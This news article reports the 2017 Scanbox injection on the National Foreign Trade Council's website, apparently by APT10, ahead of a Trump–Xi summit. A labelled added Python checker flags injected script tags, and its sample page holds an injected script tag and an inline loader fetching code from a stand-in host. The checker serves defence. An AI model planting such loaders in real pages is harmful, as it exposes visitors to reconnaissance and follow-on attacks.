[Image: US President Donald Trump and President of the People's Republic of China Xi Jinping. Credit: Reuters]

Ahead of the trade summit this week between US President Donald Trump and his Chinese counterpart, Xi Jinping, security experts claim a nation-state hacking group conducted espionage on a number of key industry players and lobbyists with links to the talks.

Between 27 February and 1 March this year, the operation – dubbed "Operation TradeSecret" – used malware in an attempt to snoop on private-sector officials registering on the website of the National Foreign Trade Council (NFTC), Fidelis Cybersecurity revealed.

The hackers targeted the NFTC's board of directors, which counts representatives from Amazon, Microsoft, Google, IBM, Visa, eBay and Cisco among its members.

Several prominent people linked to the trade group are "key participants in the dialogue around the composition of the new trade policy being formulated within the Trump administration", Fidelis said.

Pages of the website had been compromised using a reconnaissance tool known as "Scanbox", which has previously been linked to Chinese nation-state hacking teams.

The security experts found evidence that similar cyberattacks were conducted against government officials in Japan.

"We first observed the injection on the registration page for a board of directors meeting in Washington DC, scheduled for March 7, 2017," the researchers said. "The injected link would run the Scanbox framework on the computer of anyone who visited the web page.

"Scanbox can be used to determine the versions of applications, as well as other selected tools, such as JavaScript keyloggers, running on the target's machine.

"The information gathered with this reconnaissance can be used in phishing campaigns directed toward targeted individuals. These campaigns can then exploit specific vulnerabilities known to exist within the user's applications." The team said no successful attacks were uncovered.
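The injection described above works by adding a reference to an external script to a page that the intended targets are expected to visit, so that the reconnaissance framework runs in their browsers. As an added example, not code from Fidelis, the NFTC or the researchers quoted here, the following Python script is the kind of integrity check a site owner could run over their own page source to flag script references that point outside an allowlist of expected hosts, including loaders hidden inside inline scripts. The sample page, the allowlist hosts and the recon.invalid hostname are all constructed for illustration.

```python
"""Page-integrity check for injected script references (added example).

Parses an HTML page, collects every <script src> URL and every URL mentioned
inside an inline <script> body, and reports those whose host is not on the
site's allowlist. All hosts and the sample page below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Origins from which this site legitimately loads script (constructed allowlist).
ALLOWED_SCRIPT_HOSTS = {"www.example.org", "cdn.example.org"}

# Any absolute http(s) URL mentioned inside an inline script body.
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")

# Constructed page URL and registration page: two legitimate scripts, one
# injected external script, and one inline loader pointing at an unknown host.
BASE_URL = "https://www.example.org/meeting/register"
SAMPLE_PAGE = """<html><head>
<script src="/static/register.js"></script>
<script src="https://cdn.example.org/lib/forms.min.js"></script>
<script src="http://recon.invalid/scanner/load.js"></script>
<script>
var s=document.createElement('script');s.src='https://recon.invalid/i.js';
document.head.appendChild(s);
</script>
</head><body><form id="registration"></form></body></html>"""


class ScriptCollector(HTMLParser):
    """Collects external <script src> URLs and inline <script> bodies."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.external = []      # absolute URLs of external scripts
        self.inline = []        # full text of each inline script
        self._buf = None        # chunks of the inline script being read

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            # Resolve relative paths against the page URL so hosts compare cleanly.
            self.external.append(urljoin(self.base_url, src))
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf).strip())
            self._buf = None


def _off_allowlist(url, allowed_hosts):
    """True when the URL's host is missing or not an expected script origin."""
    host = urlsplit(url).hostname
    return host is None or host.lower() not in allowed_hosts


def audit_page(html, base_url, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return script references on the page that point outside the allowlist.

    'external' lists <script src> URLs on unexpected hosts; 'inline' lists URLs
    found inside inline scripts (e.g. a loader that appends a <script> element
    at runtime) on unexpected hosts.
    """
    parser = ScriptCollector(base_url)
    parser.feed(html)
    parser.close()
    external = [u for u in parser.external if _off_allowlist(u, allowed_hosts)]
    inline = [u for body in parser.inline for u in URL_RE.findall(body)
              if _off_allowlist(u, allowed_hosts)]
    return {"external": external, "inline": inline}


if __name__ == "__main__":
    report = audit_page(SAMPLE_PAGE, BASE_URL)
    for kind, urls in report.items():
        for url in urls:
            print(f"unexpected {kind} script reference: {url}")
```

Run periodically against the served page (not just the files on disk, since the injection may live in a template, a plugin or a compromised upstream asset) and alert on any hit; a well-maintained allowlist turns the check into a simple diff against what the site is known to load. It does not inspect what an allowed script does, so it complements rather than replaces a Content-Security-Policy that restricts script sources at the browser.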

However, it issued a warning to all potential targets: "Since the reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that targeted individuals will be subject to further attacks such as spearphishing campaigns."

While the malware-ridden link was removed on 2 March, Fidelis researchers said the operation had "almost certainly concluded by that time". The NFTC, a Fidelis customer, worked with the cybersecurity firm and the FBI to resolve the issue, Reuters reported.

The team said it is highly probable the hackers involved are linked to a group known as Stone Panda, or APT10. The same group was recently named as the culprit of a widespread cyber-espionage campaign in research released by UK spy agency GCHQ and BAE Systems this week (3 April).

Scanbox, the group's reconnaissance tool, was previously used in a number of well-publicised breaches blamed on Chinese state hackers. These include Anthem Healthcare and the US Office of Personnel Management (OPM), the latter of which exposed millions of federal records.

[Image: Hacking on computer. The hacking team may be APT10, the experts said. Credit: iStock]

"The findings of potential cyber-espionage occurring in trade discussions between the US and China are certainly significant," said Hardik Modi, vice president of threat research at Fidelis Cybersecurity.

Modi said the motive was likely "intelligence collection". While frowned upon and legally murky, this is generally the work of spies, and every nation with the capability to do so conducts such operations.

President Obama and Xi Jinping came to a landmark agreement in 2015 to reduce cyber-espionage operations against each other's countries. However, it remains to be seen whether that agreement remains in effect under the administration – and increasingly aggressive rhetoric – of Donald Trump.

"While this action in itself might not definitively violate the Obama-Xi Jinping agreement of 2015, it is demonstrative of the 'dual-use' nature of cyber where the private sector is likely impacted, even when nation-state espionage is the objective," Modi said.

He warned: "Coupled with the targeting that has been observed in the UK and Japan, this might mark the return of Chinese cyber in the West."